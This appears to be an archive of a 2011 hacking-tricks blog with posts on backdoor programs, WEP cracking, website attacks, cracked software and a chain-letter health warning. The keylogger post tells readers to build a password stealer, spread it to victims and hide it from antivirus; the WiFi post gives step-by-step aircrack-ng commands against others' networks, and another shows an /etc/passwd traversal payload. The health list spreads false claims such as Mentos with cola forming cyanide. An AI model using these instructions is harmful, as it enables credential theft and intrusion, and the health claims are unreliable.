Friday, August 5, 2011
Most used backdoor programs
Using these programs any noob can remotely access your computer without any Authentication and do whatever he wants. I will tell you some of the features rest of them you need to try it and find out. These Programs :
∙Work as a key logger.
∙Send any Information from Victim’s PC to the Hacker’s PC.
∙Run any program on the Victims PC.
∙Display any Violating Image on victim’s Screen.
∙Open the CD Drive of the Victim’s PC.
∙Open any Web page on the Victims Screen.
∙Disable any Specific Key or whole Keyboard.
∙Shutdown Victim’s PC.
∙Start a Song on the Victim’s PC.etc.etc…………..
∙Back Orifice / Back Orifice 2000
Back Orifice is one of the most common backdoor programs, and one of the most deadly. The name may seem like a joke, but sure, the threat is real. Back Orifice was established in Cult of the Dead Cow group. Back Orifice is an Open Source Program. The main Threat of this software is that by making some changes in the code anybody can make it undetectable to the Anti virus Program running on the Victim’s computer. Apart from the strange title, the program usually gets port 31337, the reference to “Lit” phenomenon is popular among hackers.
Back Orifice uses a client-server model, while the server and client is the victim attacker. What makes Back Orifice so dangerous that it can install and operate silently. There is not required interaction with the user in, meaning you could its on your computer right now, and do not know.
Companies such as Symantec have taken steps to protect computers against programs that they consider dangerous. But even more attacks using Back Orifice 2000. This is due partly to the fact that it is still evolving, as open source. As stated in the documentation the goal is ultimately the presence of the Back Orifice 2000 unknown even to those who installed it.
Back Orifice 2000, developed for Windows 95, Windows 98, Windows NT, Windows 2000 and Windows XP.
Where can I download Back orifice 2000?
Back Orifice 2000 can be downloaded at the following address: http://sourceforge.net/projects/bo2k/
I infected! How do I remove it?
Removing Back Orifice 2000 may require that you change the registry settings. To remove it at 7 simple steps, refer to the diagram below.
How do I delete Back orifice 2000
Click Start> Run, and type “Regedit”(without the quotes)
Follow the path below: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices “
Now looking in the right box: “The umgr32 = ‘c: windows system umgr32.exe”
Right-click on this entry and click Remove. Now restart your computer.
After restarting only open Windows Explorer. Make sure you can see all registered extensions. To do so, select “View Options and configure the appropriate settings.
Go to the WINDOWS SYSTEM directory, and find “umgr32.exe” file. Once you find it, delete it.
Exit Windows Explorer and reboot again.
NetBus / Netbus 2.0 Pro
NetBus was established around the same time that the Back Orifice was in the late 1990’s. NetBus was originally designed as a program prank friends and family, of course anything too malicious. However, the program was released in 1998, and is widely used as a backdoor to manage computer.
Like the Back Orifice, NetBus allows attackers to do virtually everything in the computer victim. It also works well under Windows 9x systems, as well as Windows XP. Unlike Back Orifice, the latest version of NetBus regarded shareware is not free. NetBus is also implementing less stealthy operations, as a direct result of criticism and complaints of abusive use.
Where can I buy and download NetBus?
NetBus can be purchased and downloaded at the following address: http://www.netbus.org/
Ok, I am infected. Now what?
Fortunately, the latest version of NetBus is a valid program. It can be removed just like any other program. Previous issuance NetBus is a bit more tricky, however. If you are not lucky enough attacked with the latest version, the withdrawal process and in the Back Orifice.
How do I remove NetBus?
Click Start> Run, and type “Regedit ‘(without the quotes)
Follow the path below: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServices “
Now, in the right box, looking as follows: “[Name_of_Server].”Exe Of course, you have to find the actual name of this file EXE-. Usually This” Patch.exe ‘or’ SysEdit.exe “, but may vary.
Reboot and remove all traces of the actual program, which can be left. Additionally, you can set yourself NetBus, and then use its own function disposal.
SubSeven / Sub7 SubSeven or Sub7, has been established for the same purpose was to NetBus pranks. Sub7 actually has more support for pranks, and has more advanced users. Sub7 also widely used by the script kiddies, although that many firewalls and anti-virus software before initialization.
Since Sub7 not supported for several years, the threat is usually very low. Most security programs will not have any problem in ending Sub7 before it has a chance to be started. This shows that the importance to the modernization and security programs is critical, because the money was still there.
Nevertheless, it is widely used by those who have physical access to your firewall, or security programs. If access rights, the tool will work without restrictions.
Where can I buy and download Sub7?
Sub7 not supported more, and hence is not available for download on any legitimate websites. If you were to make a Google search, you would find links to download Sub7. However, this is not the official site, and should be considered dubious and dangerous.
Sounds harmless, How do I remove it?
End of the following processes through the curator: “editserver.exe, subseven.exe”
Delete the following files: “editserver.exe, subseven.exe, tutorial.txt.”
Why these programs is absolutely legitimate?
All the basis behind these programs is that they are designed to help people, not harm. While some like NetBus really were originally created for pranks, they switched routes to avoid legal problems.
These programs claim to be the legitimate remote desktop program, although they certainly easily used for malicious use. These programs really should be used to aid or customer support departments. Why all adolescents is to copy these programs goes beyond us, but leave the content of their networks, while computer is a good idea.
The advent of new technology has made these programs in some respects less effective. However, programs such as Back Orifice 2000, yet still evolving, so do not be surprised to learn that he works in the background, waiting for instructions. Since the best defense is a good offense, be sure to save a sharp eye on what is installed on the network computers. After all, an ounce of prevention is worth a pound of cure.
Fool keylogger and protect yourself from hackers
lets see how simply you can fool a key logger,
When you choose passwords try using simple, capital & numbers as a combination..
when you enter them in a public computer rather than entering it in sequence try entering it in a combination
for this trick suppose my password is - hi2K1987 [DEMO password]
Now when you break your password into 3 combinations and enter them one after another (without using the backspace key) so what i did was i entered 2k first then using the mouse i went to the start of the password field and entered hi then i placed the cursor at the end and entered 1987 now simply the key logger is fooled.
he will read mah password as: delghi2k1987(fooled)
Now imagine if you use a set of numbers for your password and you enter them in a combination…
so, guys next time you enter your password you know you are safe, jst a simple trick so u can use ur own imagination..
How to find the “real” IP address of a web site?
You can use the PING utility included with Windows to determine the “real” IP address of a web site. Before using this utility, make sure you are not mapping a host name to some IP address with HostName Commander, because if you do, the PING utility will show the address you’ve set up with HostName Commander, instead of the “real” IP address.
To run the PING utility, click on the Windows Start button, and choose Run from the Start Menu. If you use Windows 95,98, or Me, enter “command” (without the quotes) as the command line to run. If you use Windows XP,2000, or NT, enter “cmd” (again, without the quotes). Click OK and the command prompt window should appear on the screen.
Now enter the word “ping” (without the quotes) followed by a space, followed by the host name you want to determine the IP address of, and press Enter:
In this example, the IP address of the host name www.rkgit.edu.in is 74.52.201.2 & IP Address of the host name www.kiet.edu is 220.225.19.55 . (Keep in mind that the IP address may change in the future!). If the PING utility reports an error, make sure your computer is connected to the Internet when you are running it.
How to Lock the folders
You can lock and unlock your folder with this simple trick !
Procedure :
1. Make a folder on the desktop and name it as “folder”
2. Now, open notepad and write ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} and now (Notepad Menu) File>save as.
3. In the ‘save as’ name it as lock.bat and click save ! (Save it on Desktop)
4. Now, again open notepad again and write ren folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder and now (Notepad Menu) File>save as.
5. In the ‘save as’ name it as key.bat and click save ! (Save it on Desktop)
6. Now, double click lock.bat to lock the folder and now if you open your folder, control panel will open up !
7. Now, double click key.bat to open the folder and now if you open your folder, you can access your data inside the folder again !
8. Lock your folder and hide the key.bat somewhere else on your hard disk !
9. Whenever you want to open your folder just paste the key.bat on desktop and open your folder using it !
Tuesday, May 24, 2011
AIRTEL SMS TIMER
This is new service from Airtel, not exactly a trick.
Example:
9895xxxxx 2508 2359 Happy Birthday!
Send it to 52233.
This will send the SMS at 11.59PM on 25th of August.
It will cost just Re.1 per sms.
SPEED UP ACROBAT READER (ALMOST LIKE NOTEPAD)
Adobe Acrobat reader always consumes more memory when it starts. The reason behind is, it loads all the plugins, even the plugins that you do not use. This trick is to remove all the plugins from the plugins directory to elsewhere. Hence, whenever you open Acrobat reader it directly opens the files without loading any plugins and the speed is just like Notepad.
(C:\program files\adobe\acrobat\reader\.. whatever)
2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy & paste).
Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).
Now your acrobat reader will load very fast and almost as good as notepad.
Monday, May 23, 2011
Access WAP Sites on PC
This tutorial will show you how to access WAP (Wireless Application Protocol) sites on your PC. Sometimes you may want to access the mobile versions of your favorite sites on your PC, but some browsers don’t support WML (Wireless Markup Language) and wont be able to display the pages.
To open WAP sites on your PC, you can use online WAP emulators or use software to do so.
Emulators:
You can use various online WAP emulators which allow you to access WAP sites using a web interface.
Some of the most popular ones include:
1. dotMobi WAP Emulator – http://mtld.mobi/emulator.php
2. WAPTiger WAP Emulator – http://www.waptiger.com/waptiger/
3. TagTag WAP Emulator – http://tagtag.com/cgi/wapemulator.cgi
Softwares:
To access WAP sites using softwares, I would recommend:
1. Opera Web Browser
Opera, the best web browser on Earth, fully supports WAP sites and allows you to surf WML pages easily.
Get Opera here: Opera Download
2. WMLBROWSER Firefox Extension
To access WAP sites in Firefox, you can install the WMLBROWSER extension. Just install the extension, go to View > Toolbars > Customize and add the WML browser Toolbar button to your toolbar. You can switch to WML ON and WML OFF to enable and disable WAP sites.
Download WMLBROWSER here: WML Browser Firefox Addon
3. WINWAP
WinWAP is a standalone WAP browser that you can use to access WAP sites on PC. It emulates cellphones, you can actually use the cellphone keys to navigate through the mobile web. You can also use different phone skins. You can get the WINWAP browser here: WinWAP Browser Emulator
Sunday, May 22, 2011
How to Hack WiFi (WEP) Using Backtrack 4
2. Open new Konsole (backtrack's terminal).
3. Type, not using qoutes, "airodump-ng wlan0". Now find the network you want to attack. Copy the BSSID and the channel (write down on piece of paper and keep handy)
4. Open new Konsole, type "airodump-ng -w wep -c 11 --bssid 00:24:b2:80:d7:3c wlan0" **X & 00:24:b2:80:d7:3c are examples of the channel and bssid you should have copied**
5. You are now fixed on to the network you want to attack.
6. Close the first Konsole, open a new Konsole and type "aireplay-ng -1 0 -a 00:24:b2:80:d7:3c wlan0" **00:24:b2:80:d7:3c is an example as well**
7. Open another new Konsole, type "aireplay-ng -3 -b 00:24:b2:80:d7:3c wlan0" **00:24:b2:80:d7:3c example"
8. Go to first Konsole, wait for the Data to reach to 30,000; go to 3rd Konsole, hit CNTL + C, then type in "dir", hit enter
9. Type "airecrack-ng wep.01.cap", hit enter.
10. Let it run its course, should only take a few moments. Once key is found, it will show up with semi-colons in it. Take out the semi-colons, and this will be the key. (Example of key; 53:06:66:51:50, so it will be 5306665150)
11. Enjoy Hacking, Enjoy Hackton.
Saturday, May 21, 2011
Remote Password Hacking/Stealer Tool
Hack E-Mail Passwords using Remote Password Hacking Tool
tDev1l keylogger is used to steal all stored passwords on victim computer. When victim opens our sent keylogger on his computer, it searches for all saved passwords on his computer and then simply sends those saved passwords along with user ids to you via email.
How to use tDev1l keylogger?
1. First of all download tDev1l keylogger from here.
You need a registration key to unlock it. Use one of these: tdev1l-its-0k-2-cry or devil-its-0k-2-cry
2. Run "tDevil.exe" file to get something like this:

3. Now simply type in your Gmail email adress and password (You can create a gmail account only for keyloggers, like this one), in "Send Logs Every Minute" choose like 30, so every 30 minutes u will get a email with the key logs. Now press "Build" and send the built app to victim. When they open nothing happens, but there keylogged and every 30 min u will get email with there key logs in.
4. To remove the Keylogger from your pc open taskmanager and kill the process "server.exe".
Now all you have to do is spread the server around and infect people with it and soon you will have lots of email in your gmail account with there Keystrokes.
5. This password stealer server is detected as virus during runtime. But, its 100% FUD (Fully Undetectable) during scantime. So, you can use Crypter / Binder to get rid of antivirus detection.
Very Important: Do not scan these tools on VirusTotal. Use http://scanner.novirusthanks.org and also check the "Do not distribute the sample" option.
Lock Your Computer With USB Flash Drive
Using this trick you will be able to lock your computer with a Usb. The computer will work only when the Usb is plugged in. Once the Usb is removed keyboard and mouse will automatically get disabled and your screen will get dark. Moreover your computer will get automatically locked. To unlock the computer you will need to insert the Usb again.
This trick will work on on all versions of windows including both windows 32 bit and 64 bit
Here is the Trick to lock Your Computer With Usb Using Predator
1. Download predator software by clicking here
2. Predator will get launched automatically after completing installation if not you can run it from Start/Programs/Predator
3. Now Insert your Usb. You will get a message to define your new password (This process will not format your pendrive and your pendrive data will not be affected by this at all)
4. Click on Ok and Enter your your new password in next dialog box
5. Check that the drive letter displayed under “USB key drive” actually matches your flash drive or choose the correct letter from the dropdown list
6. Finally click on Create Key button and then on OK button
After this the software will automatically exit.Now restart the program by clicking the icon on desktop.
Predator will take few seconds for initialization. Once the icon in the taskbar turns green then your software has initialized itself.
Friday, May 20, 2011
Please Read Them Carefully and Forward to all of Your Friends - Health is Wealth
Don't put your mobile closer to your ears until the
recipient answers, Because directly after dialing, the mobile phone would use it's maximum signaling power,
which is: 2watts = 33dbi. Please Be Careful. Please use left ear while using cell (mobile), because if you use the right one it may affect brain directly. This is a true fact from Apollo medical team.
2) APPY FIZZ
Do not drink APPY FIZZ . It contains cancer causing agent.
3) Mentos
Don't eat Mentos before or after drinking Coke or
Pepsi coz the person will die immediately as the mixture
becomes cyanide. Please fwd to whom u care.
4) Kurkure
Don't eat kurkure because it contains high amount of
plastic if U don't Believe burn kurkure n u can see
plastic melting. Please forward to all!!!!!!!!! !! News
report from Times of India
5) Avoid these tablets as they are very dangerous
* D cold
* Vicks action- 500
* Actified
* Coldarin
* Co some
* Nice
* Nimulid
* Cetrizet-D
They contain Phenyl- Propanol -Amide PPA.Which Causes strokes, and these tablets are banned in U.S.
6) Cotton Ear Buds
Cotton Ear Buds... (Must read it) Please do not show sympathy to people selling buds on roadside or at Signals..... Just wanted to warn you people not to buy those packs of ear buds you get at the roadside. It's made from cotton that has already been used in hospitals. They take all the dirty, blood and pus filled cotton, wash it, bleach it and use it to make ear buds. So, unless you want
to become the first person in the world to get Herpes Zoster Oticus (a viral infection of the inner, middle, and external ear) of the ear and that too from a cotton bud, DON'T BUY THEM! Please forward to all this may be helpful for someone..... .......
Download Unlimited From Rapidshare,Hotfile without Premium Account Tested
Hey Frens after a Huge Search over the Internet I found a absolutely wonderful site through which you can download Unlimited from sites like Rapidshare, Hotfile,Uploading,Easy-share,megaupload and much more..
CLICK HERE
You can download File with as Much as speed your Internet Connection can Support with resume option...
So Guy isn't it an Absolutely Awesome Site..
CLICK HERE
METHOD TO DOWNLOAD UNLIMITED EXPLAINED BELOW:
Step 1 : Click on the Link " CLICK HERE" . Then a webpage will open as shown below:
Step2: Copy the URL (rapidshare, hotfile or anything else..) in the Link to Transload Section..as shown:
Step3: After you click transload file and new page will open as shown and click on the link Given...
Step4: Now Thats it ..
Proxy Switcher Standard 4.6.0 Full Download
Different internet connections do often require completely different proxy server settings and it's a real pain to change them manually. Proxy Switcher provides proxy settings management solution and anonymous surfing capabilities. This includes flexible proxy server list management, proxy server tester and anonymous proxy server list downloader.
Proxy Switcher - surf anonymouslychange proxy settings on the fly
There are times when you have to cloak your true IP address. It might be that you want to remain anonymous when you visit a particular website. Or your access to various social networking and entertainment sites has been blocked.
The solution is to use Proxy Switcher for all the anonymous browsing needs. It can be used to avoid all sorts of limitations imposed by various sites. Be that a download site that limits amount of downloads. Or video site works only in a particular country - more often than not it gets defeated by the anonymous browsing features Proxy Switcher provides.
On top of that, if you used to manually change proxy settings Proxy Switcher provides a way to change them much faster and easier.Proxy Switcher Benefits:
- Hide your IP address from the web sites you visit.
- Penetrate bans and blocks on forums, classifields and download sites (rapidshare etc.).
- Automatic proxy server switching for improved anonymous surfing.
- Easy way to change proxy settings on the fly.
- For webmasters - check search engine results from different countries.
- Fully compatible with Internet Explorer, Firefox, Opera and others.
- Advanced proxy list scanning and management.Proxy Switcher 4.6.0 News
- Improved javascript enabled parser reliability, should avoid some crashes.
- Added new proxy list parsing engine - as a result new proxy list sites are added.
- Added new subcategory for Dead servers - permanently dead, ones that go into there will not get rechecked as often.
- Added check for presence of new version on site - will be shown in log.
- Program restores auto switching state after restart.
- Reduced used resources when idle even further (unused scanner workers are shut down).
Updated Ip2Country.Release Date: 31/03/2010
Language: English
Crack: +
Download Links:
Hacking Class 4 - Scanning and Attacking Open Ports
This Blog
* antivirus and spyware
* free downloads
* spyware terminator
* definitions
* tutorials
Hacking Class 4 - Scanning and Attacking Open Ports
Posted by Lokesh@Admin on Tuesday, October 20, 2009
17 comments
In my Previous class I have explained about footprinting i.e getting the IP of the Person/website/organisation whom you want to attack and extracting the personal Information.. You all were thinking that what was the use of that .. In this class you will came to know why we have undergo footprinting and analysis part...
In Scanning Part We Will Cover the Following Topics in details :
~ Definition of scanning
~ Types and objectives of Scanning
~ Understanding Scanning methodology
~ Checking live systems and open ports
~ Understanding scanning techniques
~ Different tools present to perform Scanning
~ Understanding banner grabbing and OS fingerprinting
~ Drawing network diagrams of vulnerable hosts
~ Preparing proxies
~ Understanding anonymizers
~ Scanning countermeasures
Hacking Class 4 - Scanning and Attacking Open Ports
What Is Scanning ?? And Why We Focus On that ?
Scanning as from the name means that we will scan something to find some details etc etc... Scanning basically refers to the gathering of following four informations...
We Scan systems for four basic purposes :-
* To find specific IP address
* Operating system
* System Architecture
* Services Running on system
The various types of scanning are as follows:
~Port Scanning
~Network Scanning
~Vulnerability Scanning
I want to Define These Terms here Only as they are of great use in further tutorial...
PORT SCANNING : There are 64k ports in a computer out of which 1k are fixed for system or OS services. In Port scanning we scan for the open Ports which can be used to attack the victim computer.
In Port scanning a series of messages sent to break into a computer to learn about the computer’s network services. Through this we will know that which port we will use to attack the victim..
Network Scanning : Network scanning is basically a procedure of finding the active hosts on the Network.
i.e We tries to find that system is standalone or multiuser...
This is done either for the purpose of attacking them or for network security assessment i.e how secured the network Is ??
Vulnerability Scanning : As from the name , In this type of scanning We scan the systems for finding the vulnerability i.e the weakness in OS/database ... Once we find the vulnerability or loop hole we can utilize it to Best..and attack the victim through that ...
OBJECTIVES OF SCANNING
These are Primary objectives of scanning i.e why do we do scanning :
~ To detect the live systems running on the network.
~ To discover which ports are active/running.
~ To discover the operating system running on the target system (fingerprinting).
~ To discover the services running on the target system.
~ To discover the IP address of the target system.
We will prefer TOOLS for this because they will reduce our Hectic Work... The first Tool that we Use is the NMAP :
DOWNLOAD :http://nmap.org/dist/nmap-5.00-setup.exe
Features of NMAP :
~ Nmap is used to carry out port scanning, OS detection, version detection, ping sweep, and many other techniques.
~ It scans a large number of machines at one time.
~ It is supported by many operating systems.
~ It can carry out all types of port scanning techniques.
Hacking Class 4 - Scanning and Attacking Open Ports
SECOND TOOL IS NET TOOLS 5.0.70 :
Itz is a collection of various Networking Tools ... must for beginners...
DOWNLOAD: http://www.softpedia.com/progDownload/Net-Tools-Download-22193.html
~ Net Tools Suite Pack is a collection of scanning tools.
~ This toolset contains tons of port scanners, flooders, web rippers, and mass e-mailers.
Note: Some of these tools may not Work but some are too good.
Hacking Class 4 - Scanning and Attacking Open Ports
Hacking Class 4 - Scanning and Attacking Open Ports
Thursday, May 19, 2011
How to hack a Website or websites database
As we know traces are very important. Please don't ignore them otherwise you can be in big trouble for simply doing nothing. so please take care of this step.
The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.
- how to hack
- applications
- cookie delivery
- free person search
- virus protection
For more basic knowledge about SQL injection visit:
http://www.isoftdl.com/2009/12/hacking-class-14-how-to-deface-websites.html
The above tutorial consists of both types of SQL injection i.e. Manual and automatic through softwares. I will explain SQL injection in more detail with practical example in Next class.
Some website features commonly vulnerable to XSS attacks are:
• Search Engines
• Login Forms
• Comment Fields
- college classes
- readings
- rapidshare premium account
- how to hack
- applications
Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.
I will explain this in detail in later hacking classes. So keep reading..
3. REMOTE FILE INCLUSION
Remote file inclusion is the most often found vulnerability on the website.
Remote File Inclusion (RFI) occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website which allows the hacker to execute server side commands as the current logged on user, and have access to files on the server. With this power the hacker can continue on to use local
exploits to escalate his privileges and take over the whole system.
RFI can lead to following serious things on website :
- Code execution on the web server
- Code execution on the client-side such as Javascript which can lead to other attacks such as cross site scripting (XSS).
- Denial of Service (DoS)
- Data Theft/Manipulation
4. LOCAL FILE INCLUSION
Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory transversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFI’s.
Let’s say a hacker found a vulnerable site, www.target-site.com/index.php?p=about, by means of directory transversal he would try to browse to the /etc/passwd file:
www.target-site.com/index.php?p= ../../../../../../../etc/passwd
I will explain it in detail with practical websites example in latter sequential classes on Website Hacking.
For more detailed hack on DDOS visit:
http://www.isoftdl.com/2009/11/hacking-class-11-attacking-websitesddos.html
I hope you all now have a overview of that what is Website Hacking. In consecutive future classes i will explain all of these techniques in details. So guys keep reading..
Best Operating System for Hackers
- Based on: Debian, Ubuntu
- Origin: Switzerland
- Architecture: i386
- Desktop: Fluxbox, KDE
- Category: Forensics, Rescue, Live Medium
- Cost: Free
- Metasploit integration
- RFMON Injection capable wireless drivers
- Kismet
- Nmap
- Ettercap
- Wireshark (formerly known as Ethereal)
- BeEF (Browser Exploitation Framework)
- Information Gathering
- Network Mapping
- Vulnerability Identification
- Web Application Analysis
- Radio Network Analysis (802.11, Bluetooth, Rfid)
- Penetration (Exploit & Social Engineering Toolkit)
- Privilege Escalation
- Maintaining Access
- Digital Forensics
- Reverse Engineering
- Voice Over IP
eBoostr PRO v4.0 Build 544b - Use USB drive as RAM
If there is one thing that can speed up your computer, it's memory. Adding more RAM can speed up your applications several times, decrease loading times and improve overall performance of your PC. More memory means less hard drive activity. But what if adding more RAM is not an option for you? Maybe you just don't have the necessary tools or experience, or just aren't comfortable with the idea of getting inside your PC. Or maybe you've got a notebook computer that's stuffed with RAM sticks or uses exotic and expensive memory. Or quite the opposite, you might already have enough RAM and adding more memory does not result in any visible performance benefits.Windows Vista enjoys ReadyBoost technology that uses external flash memory to speed up system performance without adding more RAM. But what if you use Windows XP and have no intention of upgrading?Hold on to your Windows XP system! There is no need to upgrade just for the sake of ReadyBoost! eBoostr speeds up Windows XP by using inexpensive flash memory. Using eBoostr increases system responsiveness and makes big applications such as Adobe Photoshop or Microsoft Office load much faster.
Unlike ReadyBoost, eBoostr is able to use almost any flash memory, including ReadyBoost certified units. Use up to four USB sticks, CompactFlash, SD, MMC or xD cards to give your Windows XP system a boost!eBoostr works perfectly for desktop computers, but laptop users gain even more. Laptop computers use slower hard drives than their desktop counterparts, and benefit even more from reducedhard drive activity provided by eBoostr. Notebooks not only work faster with eBoostr; they work longer. Less hard drive activity means less power consumption, which results in longer battery life.You might already have one or more flash sticks or memory cards sitting on your desk or in your digital camera. Plug them in, run eBoostr and enjoy the extra speed boost!
Key features of "eBoostr":
· Smart caches frequently used applications and files for maximum performance speed up;
· Supports both USB and non-USB removable media devices, as well as additional hard disks;
· Allows up to 4 devices for simultaneous smart caching;
· Compatible with all ReadyBoost ready devices.
What's New:-
· full Windows 7 compatibility
· new option of using hidden system memory for caching
Homepage - www.eboostr.com/
eBoostr PRO v4.0 Build 544b - Use USB drive as RAM
If there is one thing that can speed up your computer, it's memory. Adding more RAM can speed up your applications several times, decrease loading times and improve overall performance of your PC. More memory means less hard drive activity. But what if adding more RAM is not an option for you? Maybe you just don't have the necessary tools or experience, or just aren't comfortable with the idea of getting inside your PC. Or maybe you've got a notebook computer that's stuffed with RAM sticks or uses exotic and expensive memory. Or quite the opposite, you might already have enough RAM and adding more memory does not result in any visible performance benefits.Windows Vista enjoys ReadyBoost technology that uses external flash memory to speed up system performance without adding more RAM. But what if you use Windows XP and have no intention of upgrading?Hold on to your Windows XP system! There is no need to upgrade just for the sake of ReadyBoost! eBoostr speeds up Windows XP by using inexpensive flash memory. Using eBoostr increases system responsiveness and makes big applications such as Adobe Photoshop or Microsoft Office load much faster.
Unlike ReadyBoost, eBoostr is able to use almost any flash memory, including ReadyBoost certified units. Use up to four USB sticks, CompactFlash, SD, MMC or xD cards to give your Windows XP system a boost!eBoostr works perfectly for desktop computers, but laptop users gain even more. Laptop computers use slower hard drives than their desktop counterparts, and benefit even more from reducedhard drive activity provided by eBoostr. Notebooks not only work faster with eBoostr; they work longer. Less hard drive activity means less power consumption, which results in longer battery life.You might already have one or more flash sticks or memory cards sitting on your desk or in your digital camera. Plug them in, run eBoostr and enjoy the extra speed boost!
Key features of "eBoostr":
· Smart caches frequently used applications and files for maximum performance speed up;
· Supports both USB and non-USB removable media devices, as well as additional hard disks;
· Allows up to 4 devices for simultaneous smart caching;
· Compatible with all ReadyBoost ready devices.
What's New:-
· full Windows 7 compatibility
· new option of using hidden system memory for caching
Homepage - www.eboostr.com/
Watch TV Online -20 Free Online TV Websites
Free Online TV Websites